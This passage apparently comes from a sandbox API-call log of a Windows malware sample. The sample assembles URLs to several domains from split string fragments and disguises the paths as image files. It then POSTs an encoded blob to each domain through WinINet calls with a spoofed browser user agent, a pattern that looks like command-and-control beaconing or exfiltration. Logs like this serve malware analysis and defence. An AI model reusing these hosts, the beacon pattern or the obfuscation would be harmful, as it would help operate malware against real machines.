dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0055.922] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0055.923] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0055.923] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0055.924] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0055.924] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0055.924] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.925] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0055.925] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0055.925] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0055.925] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0055.925] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0055.925] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.wash-wear.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0055.925] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x35e0000 [0055.926] wsprintfW (in: param_1=0x35e0000, param_2="%s" | out: param_1="static/image/eske.png") returned 21 [0055.926] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="static/image/eske.png", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0055.926] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x3040000*, dwOptionalLength=0x24c | out: lpOptional=0x3040000*) returned 1 [0057.607] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0057.608] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0057.608] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.609] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.609] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0057.609] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://pp-panda74.ru") returned 20 [0057.609] lstrcpyW (in: lpString1=0x2e8d880, lpString2="uploads" | out: lpString1="uploads") returned="uploads" [0057.609] lstrcpyW (in: lpString1=0x2e8da80, lpString2="pics" | out: lpString1="pics") returned="pics" [0057.609] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="se" | out: lpString1="se") returned="se" [0057.609] lstrcatW (in: lpString1="se", lpString2="im" | out: lpString1="seim") returned="seim" [0057.609] lstrcpyW (in: lpString1=0x2e8de80, lpString2="gif" | out: lpString1="gif") returned="gif" [0057.609] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://pp-panda74.ru/uploads/pics/seim.gif") returned 42 [0057.609] lstrlenW (lpString="http://pp-panda74.ru/uploads/pics/seim.gif") returned 42 [0057.609] lstrcpyW (in: lpString1=0x2e8d618, lpString2="uploads/pics/seim.gif" | out: lpString1="uploads/pics/seim.gif") returned="uploads/pics/seim.gif" [0057.609] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0057.609] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0057.609] InternetConnectW (hInternet=0xcc0008, lpszServerName="pp-panda74.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0057.609] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0057.609] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0057.609] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0061.256] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0061.256] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0061.256] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0061.258] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0061.258] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0061.258] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2f40000 [0061.258] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0061.258] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0061.258] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0061.258] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0061.258] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0061.258] InternetConnectW (hInternet=0xcc0004, lpszServerName="pp-panda74.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0061.258] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0061.259] wsprintfW (in: param_1=0x2f50000, param_2="%s" | out: param_1="uploads/pics/seim.gif") returned 21 [0061.259] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="uploads/pics/seim.gif", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0061.259] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2f40000*, dwOptionalLength=0x24c | out: lpOptional=0x2f40000*) returned 1 [0062.604] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0062.607] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0062.607] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.608] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.608] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0062.609] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://cevent.net") returned 17 [0062.609] lstrcpyW (in: lpString1=0x2e8d880, lpString2="uploads" | out: lpString1="uploads") returned="uploads" [0062.609] lstrcpyW (in: lpString1=0x2e8da80, lpString2="tmp" | out: lpString1="tmp") returned="tmp" [0062.609] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="se" | out: lpString1="se") returned="se" [0062.609] lstrcatW (in: lpString1="se", lpString2="me" | out: lpString1="seme") returned="seme" [0062.609] lstrcatW (in: lpString1="seme", lpString2="so" | out: lpString1="semeso") returned="semeso" [0062.609] lstrcpyW (in: lpString1=0x2e8de80, lpString2="png" | out: lpString1="png") returned="png" [0062.609] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://cevent.net/uploads/tmp/semeso.png") returned 40 [0062.609] lstrlenW (lpString="http://cevent.net/uploads/tmp/semeso.png") returned 40 [0062.609] lstrcpyW (in: lpString1=0x2e8d618, lpString2="uploads/tmp/semeso.png" | out: lpString1="uploads/tmp/semeso.png") returned="uploads/tmp/semeso.png" [0062.609] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0062.609] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0062.609] InternetConnectW (hInternet=0xcc0008, lpszServerName="cevent.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0062.609] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0062.609] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0062.609] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0063.222] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0063.222] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0063.222] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0063.223] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0063.223] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0063.223] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2f40000 [0063.223] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0063.223] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0063.223] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0063.223] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0063.223] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0063.223] InternetConnectW (hInternet=0xcc0004, lpszServerName="cevent.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0063.224] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0063.224] wsprintfW (in: param_1=0x2f50000, param_2="%s" | out: param_1="uploads/tmp/semeso.png") returned 22 [0063.224] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="uploads/tmp/semeso.png", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0063.224] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2f40000*, dwOptionalLength=0x24c | out: lpOptional=0x2f40000*) returned 1 [0063.545] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0063.545] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0063.545] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.546] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.546] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0063.546] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://bellytobabyphotographyseattle.com") returned 40 [0063.546] lstrcpyW (in: lpString1=0x2e8d880, lpString2="data" | out: lpString1="data") returned="data" [0063.546] lstrcpyW (in: lpString1=0x2e8da80, lpString2="graphic" | out: lpString1="graphic") returned="graphic" [0063.546] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="ke" | out: lpString1="ke") returned="ke" [0063.546] lstrcatW (in: lpString1="ke", lpString2="es" | out: lpString1="kees") returned="kees" [0063.546] lstrcpyW (in: lpString1=0x2e8de80, lpString2="png" | out: lpString1="png") returned="png" [0063.546] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://bellytobabyphotographyseattle.com/data/graphic/kees.png") returned 62 [0063.546] lstrlenW (lpString="http://bellytobabyphotographyseattle.com/data/graphic/kees.png") returned 62 [0063.546] lstrcpyW (in: lpString1=0x2e8d618, lpString2="data/graphic/kees.png" | out: lpString1="data/graphic/kees.png") returned="data/graphic/kees.png" [0063.546] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0063.547] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0063.547] InternetConnectW (hInternet=0xcc0008, lpszServerName="bellytobabyphotographyseattle.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0063.547] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0063.547] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0063.547] HttpSendRequestW (hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0, dwOptionalLength=0x0) returned 0 [0064.783] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0064.783] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0064.783] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0064.783] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2f40000 [0064.783] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0064.783] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0064.784] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0064.784] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0064.784] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0064.784] InternetConnectW (hInternet=0xcc0004, lpszServerName="bellytobabyphotographyseattle.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0064.784] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0064.784] wsprintfW (in: param_1=0x2f50000, param_2="%s" | out: param_1="data/graphic/kees.png") returned 21 [0064.784] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="data/graphic/kees.png", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0064.784] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2f40000, dwOptionalLength=0x24c) returned 0 [0064.796] GetLastError () returned 0x2ee7 [0064.796] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0064.796] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0064.796] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.797] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.797] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0064.797] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://alem.be") returned 14 [0064.797] lstrcpyW (in: lpString1=0x2e8d880, lpString2="news" | out: lpString1="news") returned="news" [0064.797] lstrcpyW (in: lpString1=0x2e8da80, lpString2="graphic" | out: lpString1="graphic") returned="graphic" [0064.797] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="zu" | out: lpString1="zu") returned="zu" [0064.797] lstrcatW (in: lpString1="zu", lpString2="ru" | out: lpString1="zuru") returned="zuru" [0064.797] lstrcpyW (in: lpString1=0x2e8de80, lpString2="png" | out: lpString1="png") returned="png" [0064.797] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://alem.be/news/graphic/zuru.png") returned 36 [0064.797] lstrlenW (lpString="http://alem.be/news/graphic/zuru.png") returned 36 [0064.797] lstrcpyW (in: lpString1=0x2e8d618, lpString2="news/graphic/zuru.png" | out: lpString1="news/graphic/zuru.png") returned="news/graphic/zuru.png" [0064.798] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0064.798] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0064.798] InternetConnectW (hInternet=0xcc0008, lpszServerName="alem.be", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0064.798] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0064.798] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0064.798] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0065.352] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0065.352] lstrcmpiA (lpString1="50x", lpString2="30x") returned 1 [0065.352] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0065.352] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0065.352] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0065.352] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2f40000 [0065.353] lstrlenA 